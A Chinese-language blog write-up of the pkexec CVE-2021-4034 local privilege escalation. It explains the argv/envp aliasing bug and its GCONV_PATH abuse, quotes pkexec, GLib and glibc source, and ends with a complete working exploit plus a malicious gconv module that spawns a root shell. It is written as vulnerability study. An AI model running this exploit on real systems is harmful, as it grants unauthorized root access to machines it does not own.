CVE-2021-4034 Write-up

2022-02-18

前言

好一陣子之前在 Twitter 上看到有人提到這個 CVE,pkexec 存在漏洞可以使攻擊者能夠提權變成 root,而這支 SUID program 在許多 linux distros 上是預設安裝的,在看了 seclists 上的文章後,我自己覺得這個漏洞真的蠻酷的,對我來說最主要的酷點是沒看過類似的洞,並且也是第一次看到這樣的利用方式,所以當下就決定之後要來寫看看這個 CVE 的 exploit 了,給自己的限制就是只能看前面提到的文章,接下來就來講講過程吧!

當然,如果文中有誤的部分,還請大神們不吝指正 <(_ _)>

漏洞

  • 漏洞成因在 seclists 文章中寫得很清楚,這邊主要參考原文來寫
  • 來看一下修補前的 source code:
    int
    main (int argc, char *argv[])
    {
      guint n;
      gchar *path;
      gchar *s;
      ...
      for (n = 1; n < (guint) argc; n++)
      {
          // 找各種參數
          ...
      }
      g_assert (argv[argc] == NULL);
      path = g_strdup (argv[n]);
      if (path[0] != '/')
      {
          s = g_find_program_in_path (path);
          if (s == NULL)
          {
              g_printerr ("Cannot run program %s: %s\n", path, strerror (ENOENT));
              goto out;
          }
          ...
          argv[n] = path = s;
      }
    }
    
  • 這部分的 code 將 argv[n] 當作 path,而 n 會先設定為 1
  • 通常一支程式的 argv 會按照以下格式來排
    argv = {"/path/to/binary", "-option", "option_value", NULL}
    
  • 這部分可以參考 你所不知道的 C 語言: 執行階段程式庫 (CRT) 對於 argv 的描述
  • 另外 argv 也有其他妙用,比如說 busybox,在許多的嵌入式系統中,如果你執行 ls -al /bin,高機率會發現一坨常用程式 e.g. ls 都只是一個 link,並指向到 busybox,這種情況下,argv[0] 就會是連結的名字 (ls),而 busybox 內部就能以 argv[0] 是什麼來判斷現在要執行什麼程式
  • 以上是一些 argv 的補充,但沒有人規定一定要這樣傳 argv
  • 假設執行以下程式:
    int main()
    {
      // execve
      syscall(0x3b, "/usr/bin/pkexec", NULL, NULL);
    }
    
  • 這個情況下 argv 就會是:
    argv = { NULL }
    
  • argv[1] 就超出 argv 陣列範圍了,下個問題是,在 argv 之後的東西是什麼?其實就是 envp
  • 也就是說在這個情況下,argv[1] 就跟 envp[0] 一樣!

利用思路

  • 由於 pkexec 是一支 SUID program,能在這支程式中達到任意執行就等同於提權
  • 也因為他是 SUID program,所以許多可能導致任意執行的環境變數會先被 ld.so 過濾掉,比如說 LD_PRELOAD,能讓我們設定想要加載的 so,如果有一個平行時空都不過濾像這樣的環境變數,那麼自己寫一個 so,讓 SUID program 的 LD_PRELOAD 設定成我們的 so,如此不就能達到在 SUID program 執行我們想執行的程式碼,那不就提權了?總之,對於一支 SUID program,環境變數是一個危險因子
  • 再來看一下剛剛的 source code
  • 如果我們傳入的 argv 舊址是一個 NULL
path = g_strdup (argv[n]);
  • n 為 1,於是 path 被設為 argv[1],也就是 envp[0]
  • s 會找出 path 的絕對路徑,這點就配合了 PATH 環境變數,假設 PATH=/binpath=ls,那 s 找完後就會變成 /bin/ls (當然前提是 /bin/ls 存在)
  • 接著 argv[n] = path = s 把找好的絕對路徑 s 放回 argv[1],也就是放回 envp[0],那就改到了一個環境變數
  • envp[0] 設為 value,並設另一個環境變數 PATH=name=.,並且創建好檔案 name=./value
  • s 找完路徑後變成 name=./value
  • envp[0] 被設為 name=./value
  • 即使在加載階段,一些危險的環境變數被過濾了,但現在,我們能夠繞過過濾,只要抽換一下 namevalue,就能設定任意的危險環境變數!

argv[1] == envp[0]?

  • 首先先來驗證一下這件事情:
    int main()
    {
      char* envp[] = {"yoyodiy",           // <Env value>
                      NULL};
    
      printf("[*] GoGo!\n");
    
      // execve
      syscall(0x3b, "/usr/bin/pkexec", NULL, envp);
    }
    
  • 輸出畫面:
  • pathargv[1] 拿來,也就是從 envp[0] 拿到,所以才有輸出畫面中的 Cannot run program yoyodiy

用什麼環境變數?

  • seclists 上的文章中,提到了 GLib (不是 glibc) 的 g_printerr() 呼叫,有機會有 CODESET 轉換,而這個過程中就會用到 iconv_open(),而這函數的設定檔位置是用 GCONV_PATH 環境變數來決定的,然後文章一句話帶過去:

    Unfortunately, CVE-2021-4034 allows us to re-introduce GCONV_PATH into pkexec’s environment, and to execute our own shared library, as root.

  • 從文章來看,就是用這個 GCONV_PATH 了,那這個環境變數會不會被過濾掉呢?參考 Character Set Handling:

    The GNU C library implementation of iconv_open has one significant extension to other implementations. To ease the extension of the set of available conversions the implementation allows storing the necessary files with data and code in arbitrarily many directories. How this extension has to be written will be explained below (see section The iconv Implementation in the GNU C library). Here it is only important to say that all directories mentioned in the GCONV_PATH environment variable are considered if they contain a file gconv-modules. These directories need not necessarily be created by the system administrator. In fact, this extension is introduced to help users writing and using their own, new conversions. Of course this does not work for security reasons in SUID binaries; in this case only the system directory is considered and this normally is prefix/lib/gconv. The GCONV_PATH environment variable is examined exactly once at the first call of the iconv_open function. Later modifications of the variable have no effect.

  • GCONV_PATH 設定的目錄底下含有 gconv-modules,就會使用這個設定檔,而這個設定檔看來是能夠設定要載什麼 CHARSET conversions 的實作 library
  • 總之先驗證一下這件事情,驗證方式嘛…,既然會讀檔,那就有開檔的 syscall,不如就用 strace 來看看:
    int main()
    {
      char* envp[] = {"yoyodiy",           // <Env value>
                      "PATH=GCONV_PATH=.", // PATH=<Env name>=.
                      "SHELL=/yoyo/sh",    // Trigger g_printerr
                      NULL};
    
      printf("[*] GoGo!\n");
    
      // execve
      syscall(0x3b, "/usr/bin/pkexec", NULL, envp);
    
      // Never return
      printf("You should not be here!\n");
    }
    
  • 首先解釋一下 poc 的 code
  • 藉由設定 envp[0] = yoyodiy,以及 PATH=GCONV_PATH=.,漏洞執行後會設定 envp[0] = GCONV_PATH=./yoyodiy
  • 漏洞要順利執行的話,那麼要讓它找得到路徑,也就是說我們要先準備 GCONV_PATH=. 目錄,在底下放 yoyodiy 檔案
  • 接著照著文章說的,走到 g_printerr() 就會有 CODESET 轉換,進而才會吃設定檔
  • 要走到 g_printerr(),可以看以下 source code:
    /* now save the environment variables we care about */
    saved_env = g_ptr_array_new ();
    for (n = 0; environment_variables_to_save[n] != NULL; n++)
    {
      const gchar *key = environment_variables_to_save[n];
      const gchar *value;
    
      value = g_getenv (key);
      if (value == NULL)
          continue;
    
      /* To qualify for the paranoia goldstar - we validate the value of each
       * environment variable passed through - this is to attempt to avoid
       * exploits in (potentially broken) programs launched via pkexec(1).
       */
      if (!validate_environment_variable (key, value))
          goto out;
    
      g_ptr_array_add (saved_env, g_strdup (key));
      g_ptr_array_add (saved_env, g_strdup (value));
    }
    
  • environment_variables_to_save 是一系列環境變數名稱,其中包含了 SHELL
  • SHELL 環境變數有設定,取得後會走到 validate_environment_variable() 驗證他的正確性
  • validate_environment_variable()
    /* special case $SHELL */
    if (g_strcmp0 (key, "SHELL") == 0)
    {
      /* check if it's in /etc/shells */
      if (!is_valid_shell (value))
      {
          log_message (LOG_CRIT, TRUE,
                       "The value for the SHELL variable was not found the /etc/shells file");
          g_printerr ("\n"
                      "This incident has been reported.\n");
          goto out;
      }
    }
    
  • SHELL 沒有出現在 /etc/shells 裡面,就會走到 g_printerr()
  • 接著執行指令: sudo sh -c "strace ./poc > log 2>&1"
  • log 的部分內容:
    getcwd("/home/pt/CVE-2021-4034", 4096)  = 23
    openat(AT_FDCWD, "/home/pt/CVE-2021-4034/./yoyodiy/gconv-modules", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
    openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules", O_RDONLY|O_CLOEXEC) = 4
    fstat(4, {st_mode=S_IFREG|0644, st_size=56353, ...}) = 0
    read(4, "# GNU libc iconv configuration.\n"..., 4096) = 4096
    read(4, "B1002//\tJUS_I.B1.002//\nmodule\tJU"..., 4096) = 4096
    read(4, "\tISO-IR-110//\t\tISO-8859-4//\nalia"..., 4096) = 4096
    read(4, "\t\t\tISO-8859-14//\nalias\tISO_8859-"..., 4096) = 4096
    read(4, "DIC-ES//\nalias\tEBCDICES//\t\tEBCDI"..., 4096) = 4096
    read(4, "CDIC-CP-ES//\t\tIBM284//\nalias\tCSI"..., 4096) = 4096
    read(4, "\t\tIBM863//\nalias\tOSF1002035F//\t\t"..., 4096) = 4096
    brk(0x55735afa6000)                     = 0x55735afa6000
    read(4, "937//\t\tIBM937//\nmodule\tIBM937//\t"..., 4096) = 4096
    read(4, "UJIS//\t\t\tEUC-JP//\nmodule\tEUC-JP/"..., 4096) = 4096
    read(4, "lias\tISO2022CN//\t\tISO-2022-CN//\n"..., 4096) = 4096
    read(4, "O_5427-EXT//\nalias\tISO_5427EXT//"..., 4096) = 4096
    read(4, "ost\nmodule\tMAC-SAMI//\t\tINTERNAL\t"..., 4096) = 4096
    read(4, "112//\t\tINTERNAL\t\tIBM1112\t\t1\nmodu"..., 4096) = 4096
    read(4, "s\tCP9448//\t\tIBM9448//\nalias\tCSIB"..., 4096) = 3105
    read(4, "", 4096)                       = 0
    
  • 可以看到的確嘗試開啟 /home/pt/CVE-2021-4034/./yoyodiy/gconv-modules,那下個問題是,要怎麼寫 gconv-modules

gconv-modules

  • 參閱一下手冊 6.5.4.1 Format of gconv-modules files
  • 簡易設定檔例如以下:
    module  ISO-2022-JP//   EUC-JP//        ISO2022JP-EUCJP    1
    
  • 第一個欄位表示這是什麼功能,有 aliasmodule,接下來講 module 的欄位定義
  • 第二個欄位是 from
  • 第三個欄位是 to
  • 第四個欄位是 loadable module
  • 第五個欄位是 cost
  • 當今天有呼叫到 iconv_open(const char *tocode, const char *fromcode) (man page),就會根據這個設定檔,去找到對應的 loadable module 來做轉換 CODESET 的工作
  • 而 loadable module 要怎麼寫也有在手冊中的 6.5.4.4 iconv module interfaces 提到
  • 需 export 以下三個函數:
    • gconv_init
    • gconv_end
    • gconv
  • 問題接下來是,程式真的會呼叫到 iconv_open() 嗎?直接 sudo gdb poc 來看看:
  • 會從 UTF-8 轉到 ANSI_X3.4-1968,於是我們可以寫以下 config:
#         from       to                  module    cost
module    UTF-8//    ANSI_X3.4-1968//    wtf       1
  • 如此轉換時就會用到我們的 wtf module,wtf 如下:
int gconv_init (void *_)
{
    // -p priv  Do not attempt to reset effective uid if it does not match uid. This is not set by
    //          default to help avoid incorrect usage by setuid root programs via system(3) or
    //          popen(3).
    char *argv[] = {"/bin/sh", "-p", NULL};
    puts("[*] Run arbitrary shared library");
    setenv("PATH", "/bin:/usr/bin", 1);
    execve("/bin/sh", argv, NULL);
}

void gconv_end (void *data)
{
}

int gconv (void)
{
    return 0;
}
  • 如此就能得到 shell!
  • 這邊可以補充一下,原本我只有寫 gconv_init(),但會失敗,原因是要看 source code:
/* Open the gconv database if necessary.  A non-negative return value
   means success.  */
struct __gconv_loaded_object *
__gconv_find_shlib (const char *name)
{
    ...
    /* Try to load the shared object if the usage count is 0.  This
       implies that if the shared object is not loadable, the handle is
       NULL and the usage count > 0.  */
    if (found != NULL)
    {
        if (found->counter < -TRIES_BEFORE_UNLOAD)
        {
            assert (found->handle == NULL);
            found->handle = __libc_dlopen (found->name);
            if (found->handle != NULL)
            {
                found->fct = __libc_dlsym (found->handle, "gconv");
                if (found->fct == NULL)
                {
                    /* Argh, no conversion function.  There is something
                               wrong here.  */
                    __gconv_release_shlib (found);
                    found = NULL;
                }
                else
                {
                    found->init_fct = __libc_dlsym (found->handle, "gconv_init");
                    found->end_fct = __libc_dlsym (found->handle, "gconv_end");

#ifdef PTR_MANGLE
                    PTR_MANGLE (found->fct);
                    PTR_MANGLE (found->init_fct);
                    PTR_MANGLE (found->end_fct);
#endif

                    /* We have succeeded in loading the shared object.  */
                    found->counter = 1;
                }
            }
        else
            ...
    }
    else if (found->handle != NULL)
        ...
    }

  return found;
}
  • 可以看到若沒有 gconv 則會走到 __gconv_release_shlib(),就不會成功了

g_printerr()

  • 在這過程中有找了一下為什麼 g_printerr() 會觸發 iconv_open(),這邊補充一下追蹤的過程
  • g_printerr()
/**
 * g_printerr:
 * @format: the message format. See the printf() documentation
 * @...: the parameters to insert into the format string
 *
 * Outputs a formatted message via the error message handler.
 * The default handler simply outputs the message to stderr, without appending
 * a trailing new-line character. Typically, @format should end with its own
 * new-line character.
 *
 * g_printerr() should not be used from within libraries.
 * Instead g_log() or g_log_structured() should be used, or the convenience
 * macros g_message(), g_warning() and g_error().
 */
void
g_printerr (const gchar *format,
            ...)
{
  va_list args;
  gchar *string;
  GPrintFunc local_glib_printerr_func;

  g_return_if_fail (format != NULL);

  va_start (args, format);
  string = g_strdup_vprintf (format, args);
  va_end (args);

  g_mutex_lock (&g_messages_lock);
  local_glib_printerr_func = glib_printerr_func;
  g_mutex_unlock (&g_messages_lock);

  if (local_glib_printerr_func)
    local_glib_printerr_func (string);
  else
    {
      const gchar *charset;

      if (g_get_console_charset (&charset))
        fputs (string, stderr); /* charset is UTF-8 already */
      else
        {
          gchar *lstring = strdup_convert (string, charset);

          fputs (lstring, stderr);
          g_free (lstring);
        }
      fflush (stderr);
    }
  g_free (string);
}
/**
 * g_get_console_charset:
 * @charset: (out) (optional) (transfer none): return location for character set
 *   name, or %NULL.
 *
 * Obtains the character set used by the console attached to the process,
 * which is suitable for printing output to the terminal.
 *
 * Usually this matches the result returned by g_get_charset(), but in
 * environments where the locale's character set does not match the encoding
 * of the console this function tries to guess a more suitable value instead.
 *
 * On Windows the character set returned by this function is the
 * output code page used by the console associated with the calling process.
 * If the codepage can't be determined (for example because there is no
 * console attached) UTF-8 is assumed.
 *
 * The return value is %TRUE if the locale's encoding is UTF-8, in that
 * case you can perhaps avoid calling g_convert().
 *
 * The string returned in @charset is not allocated, and should not be
 * freed.
 *
 * Returns: %TRUE if the returned charset is UTF-8
 *
 * Since: 2.62
 */
gboolean
g_get_console_charset (const char **charset)
{
#ifdef G_OS_WIN32
    ...
#else
  /* assume the locale settings match the console encoding on non-Windows OSs */
  return g_get_charset (charset);
#endif
}
/**
 * g_get_charset:
 * @charset: (out) (optional) (transfer none): return location for character set
 *   name, or %NULL.
 *
 * Obtains the character set for the [current locale][setlocale]; you
 * might use this character set as an argument to g_convert(), to convert
 * from the current locale's encoding to some other encoding. (Frequently
 * g_locale_to_utf8() and g_locale_from_utf8() are nice shortcuts, though.)
 *
 * On Windows the character set returned by this function is the
 * so-called system default ANSI code-page. That is the character set
 * used by the "narrow" versions of C library and Win32 functions that
 * handle file names. It might be different from the character set
 * used by the C library's current locale.
 *
 * On Linux, the character set is found by consulting nl_langinfo() if
 * available. If not, the environment variables `LC_ALL`, `LC_CTYPE`, `LANG`
 * and `CHARSET` are queried in order.
 *
 * The return value is %TRUE if the locale's encoding is UTF-8, in that
 * case you can perhaps avoid calling g_convert().
 *
 * The string returned in @charset is not allocated, and should not be
 * freed.
 *
 * Returns: %TRUE if the returned charset is UTF-8
 */
gboolean
g_get_charset (const char **charset)
{
  static GPrivate cache_private = G_PRIVATE_INIT (charset_cache_free);
  GCharsetCache *cache = g_private_get (&cache_private);
  const gchar *raw;

  if (!cache)
    cache = g_private_set_alloc0 (&cache_private, sizeof (GCharsetCache));

  G_LOCK (aliases);
  raw = _g_locale_charset_raw ();
  G_UNLOCK (aliases);

  if (cache->raw == NULL || strcmp (cache->raw, raw) != 0)
    {
      const gchar *new_charset;

      g_free (cache->raw);
      g_free (cache->charset);
      cache->raw = g_strdup (raw);
      cache->is_utf8 = g_utf8_get_charset_internal (raw, &new_charset);
      cache->charset = g_strdup (new_charset);
    }

  if (charset)
    *charset = cache->charset;

  return cache->is_utf8;
}
/* Determine the current locale's character encoding, and canonicalize it
   into one of the canonical names listed in config.charset.
   The result must not be freed; it is statically allocated.
   If the canonical name cannot be determined, the result is a non-canonical
   name.  */

const char *
_g_locale_charset_raw (void)
{
  const char *codeset;

#if !(defined WIN32_NATIVE || defined OS2)

# if HAVE_LANGINFO_CODESET
/* Most systems support nl_langinfo (CODESET) nowadays.  */
  codeset = nl_langinfo (CODESET);
#  ifdef __CYGWIN__
    ...
#  endif

# else
    ...
# endif

#elif defined WIN32_NATIVE
    ...
#elif defined OS2
    ...
#endif

  return codeset;
}
  • codeset 從 nl_langinfo (CODESET) 得來
  • 參考 nl_langinfo man page

    CODESET (LC_CTYPE) Return a string with the name of the character encoding used in the selected locale, such as “UTF-8”, “ISO-8859-1”, or “ANSI_X3.4-1968” (better known as US-ASCII). This is the same string that you get with “locale charmap”. For a list of character encoding names, try “locale -m” (see locale(1)).

  • 有三種 CODESET: UTF-8ISO-8859-1ANSI_X3.4-1968
  • 系統上不一定全部語言都有,查看現在有什麼語言可以使用 locale -a
    ➜  ~ locale -a
    C
    C.UTF-8
    da_DK
    da_DK.iso88591
    danish
    en_AG
    en_AG.utf8
    en_AU.utf8
    en_BW.utf8
    en_CA.utf8
    en_DK.utf8
    en_GB.utf8
    en_HK.utf8
    en_IE.utf8
    en_IL
    en_IL.utf8
    en_IN
    en_IN.utf8
    en_NG
    en_NG.utf8
    en_NZ.utf8
    en_PH.utf8
    en_SG.utf8
    en_US.utf8
    en_ZA.utf8
    en_ZM
    en_ZM.utf8
    en_ZW.utf8
    es_SV.utf8
    POSIX
    
  • 裡面的 da_DK 就是另外用 locale-gen 產生出來的,但這個指令需要特權
  • 只要沒有後綴 .utf8.iso88591, 預設 CODESET 就是 ANSI_X3.4-1968,例如說執行以下程式:
int main(int argc, char *argv[])
{
    setlocale(LC_ALL, "C");

    printf("%s\n", nl_langinfo(CODESET));
}
  • 則會輸出 ANSI_X3.4-1968
  • 回過頭來,走到 strdup_convert,預設 charset 是 UTF-8,此函數換嘗試轉 charset 到前面取出的 charset ANSI_X3.4-1968
  • 為了保證會轉 CODESET,可以在 exploit 加上設定 locale

Full exploit code

  • 最終的 exploit 長如下:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <langinfo.h>
#include <locale.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>

int main()
{
    struct stat st = {0};
    char* envp[] = {"yoyodiy",           // <Env value>
                    "PATH=GCONV_PATH=.", // PATH=<Env name>=.
                    "SHELL=/yoyo/sh",    // Trigger g_printerr
                    NULL};

    setlocale(LC_ALL, "C");

    printf("[*] Create GCONV_PATH=./yoyodiy\n");

    if (stat("GCONV_PATH=.", &st) == -1) {
        if (mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IRWXO) == -1) {
            printf("Cannot create directory: %s\n", strerror(errno));
            return 1;
        }
    }

    if (stat("GCONV_PATH=./yoyodiy", &st) == -1) {
        int fd = open("GCONV_PATH=./yoyodiy", O_WRONLY | O_APPEND | O_CREAT, 0755);
        if (fd == -1) {
            printf("Cannot create file: %s\n", strerror(errno));
            return 1;
        }
        close(fd);
    }

    printf("[*] GoGo!\n");

    // It will try to open <GCONV_PATH>/gconv-modules
    // --> ./<Env value>/gconv-modules

    // execve
    syscall(0x3b, "/usr/bin/pkexec", NULL, envp);

    // Never return
    printf("You should not be here!\n");
}
  • 並且要準備好 yoyodiy 目錄,底下放置…
    • gconv-modules
    • wtf.so

Reference